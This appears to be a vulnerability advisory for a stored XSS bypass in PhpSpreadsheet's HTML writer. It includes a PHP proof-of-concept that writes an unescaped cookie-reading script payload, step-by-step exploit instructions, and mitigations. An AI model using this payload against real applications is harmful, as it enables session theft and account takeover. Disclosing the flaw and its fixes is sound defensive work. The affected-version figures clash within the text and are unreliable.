PhpSpreadsheet, HTML Escaping Bypass, CVE-2026-40296 (Critical)


The vulnerability resides in the HTML writer's logic in `Writer/Html.php`, at approximately line 1592. There, the code applies `htmlspecialchars()`, PHP's standard HTML entity encoder, only when the formatted cell data is strictly identical to the original data. The check, `if ($cellData === $origData)`, is intended to avoid double-escaping, but it is the root of the bypass.

When a cell carries a custom number format containing the `@` text placeholder, such as `. @`, the formatter replaces `@` with the cell's value and keeps the surrounding literal characters (here a period and a space). The formatted output (`. <img src=x onerror=alert(document.cookie)>`) therefore differs from the original raw string, the equality check fails, the conditional block is skipped, and `htmlspecialchars()` is never applied to that cell. The raw HTML/JavaScript payload is written directly into the HTML output.

The bypass is exceptionally sensitive: even a trailing space in the format code (e.g., `@ `) is enough to break the equality check. This was confirmed to be effective in versions up to 4.5.0, allowing stored Cross-Site Scripting (XSS) when an application converts an uploaded file and displays the generated HTML to users.


Platform: PhpSpreadsheet
Version: <=5.6.0
Vulnerability: XSS Bypass
Severity: CRITICAL
Date: 2026-04-28

Prediction: Patch 2026-05-05

Analytics under What Undercode Say:

Command to check your installed version of PhpSpreadsheet:

composer show phpoffice/phpspreadsheet

Find the vulnerable code line in `Writer/Html.php`:

grep -n "if (\$cellData === \$origData)" vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Writer/Html.php

Proof of Concept: PHP script that generates an HTML file containing the unescaped cell. Save it as poc.php and run it with `php poc.php`:

cat > poc.php << 'EOF'
<?php
require 'vendor/autoload.php';

use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Html;
use PhpOffice\PhpSpreadsheet\Cell\DataType;

$spreadsheet = new Spreadsheet();
$sheet = $spreadsheet->getActiveSheet();

// Store the payload as an explicit string so it is not interpreted as a formula
$sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING);

// Custom format with the '@' text placeholder: the formatted value ('. <img ...>')
// differs from the raw value, so the writer's equality check skips htmlspecialchars()
$sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @');

$writer = new Html($spreadsheet);
$writer->save('output.html');
echo "Vulnerable file 'output.html' created.\n";
EOF
php poc.php

Exploit:

  1. Craft a Malicious XLSX: An attacker creates an XLSX file where a cell contains a JavaScript payload (e.g., <img src=x onerror=alert(document.cookie)>).
  2. Set a Custom Number Format: The attacker applies a custom number format to that cell. The format must include the text placeholder `@` followed by or preceded by any literal character (e.g., '. @', 'x@', or even a trailing space '@ ').
  3. Upload File: The attacker uploads this crafted XLSX file to a vulnerable application (e.g., a file converter or a data import tool).
  4. Trigger Execution: When the application uses the vulnerable version of PhpSpreadsheet to convert the XLSX file to HTML, the escaping mechanism is bypassed. The raw HTML/JavaScript is written directly to the output file.
  5. Stored XSS: Any victim who later views the generated HTML page will have the attacker’s script executed in their browser context, leading to potential session hijacking, data theft, or defacement.

Protection from this CVE

  • Update PhpSpreadsheet: Upgrade to a patched version immediately. According to the official advisory, fixed versions are 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0 or higher.
  • Patch the Logic: If an update is not possible, modify the conditional escaping logic in `Writer/Html.php` so that `htmlspecialchars()` is always applied, regardless of whether formatting changed the value.
  • Content Security Policy: Deploy a strict CSP that blocks inline script execution; it does not fix the bug but acts as a secondary layer of defense.
  • Review Dependencies: Integrate automated vulnerability scanning into your CI/CD pipeline (e.g., `composer audit`) to detect known vulnerabilities in dependencies.
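To make the escaping decision described above concrete, here is an added illustration (not PhpSpreadsheet's own code) that re-creates the vulnerable condition beside the always-escape fix recommended in the protection list. `applyTextFormat()` is a hypothetical stand-in for the library's number formatter that only handles the `@` placeholder, and the sample cell value is constructed from the payload quoted in this advisory.

```php
<?php
// Added illustration, not PhpSpreadsheet's own code: a simplified re-creation of
// the conditional escaping described in this advisory, beside the always-escape fix.

// Hypothetical stand-in for the library's number formatter. It only handles the
// '@' text placeholder: '@' is replaced by the cell value and the literal
// characters around it (e.g. '. ' or a trailing space) are kept.
function applyTextFormat(string $value, string $formatCode): string
{
    if (strpos($formatCode, '@') === false) {
        return $value;   // no text placeholder: the value passes through unchanged
    }
    return str_replace('@', $value, $formatCode);
}

// Vulnerable pattern: escape only when formatting left the value unchanged.
// Any format that adds a literal makes $cellData !== $origData, so escaping is skipped.
function renderCellVulnerable(string $origData, string $formatCode): string
{
    $cellData = applyTextFormat($origData, $formatCode);
    if ($cellData === $origData) {
        $cellData = htmlspecialchars($cellData, ENT_QUOTES, 'UTF-8');
    }
    return $cellData;
}

// Fixed pattern: escape the final cell text unconditionally.
function renderCellFixed(string $origData, string $formatCode): string
{
    $cellData = applyTextFormat($origData, $formatCode);
    return htmlspecialchars($cellData, ENT_QUOTES, 'UTF-8');
}

// Constructed sample cell: the payload quoted in the advisory.
$payload = '<img src=x onerror=alert(document.cookie)>';

// 'General' leaves the value untouched; the other three all break the equality check.
foreach (['General', '. @', 'x@', '@ '] as $format) {
    $vulnerable = renderCellVulnerable($payload, $format);
    $fixed      = renderCellFixed($payload, $format);
    printf(
        "format %-10s vulnerable: %-9s fixed: %s\n",
        var_export($format, true),
        strpos($vulnerable, '<') === false ? 'escaped' : 'UNESCAPED',
        strpos($fixed, '<') === false ? 'escaped' : 'UNESCAPED'
    );
}
```

For every format that places a literal next to `@` (including the trailing-space case `@ `), the vulnerable function returns the payload unencoded while the fixed function encodes it; only the pass-through `General` format is escaped by both.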

Impact

  • Stored Cross-Site Scripting (XSS): An attacker can inject persistent malicious scripts into the trusted web application.
  • Data Theft: Execution of JavaScript in a privileged context allows an attacker to steal cookies, session tokens, or other sensitive information from the victim’s browser.
  • Account Hijacking: Stolen session tokens for administrative areas or user accounts can lead to complete account takeover.
  • Application Disruption: Attackers could modify or delete content, or cause the application to malfunction for users.
  • Reputation Damage: A successful XSS attack can severely damage an organization’s trust and compliance standing.


Sources:

Reported By: github.com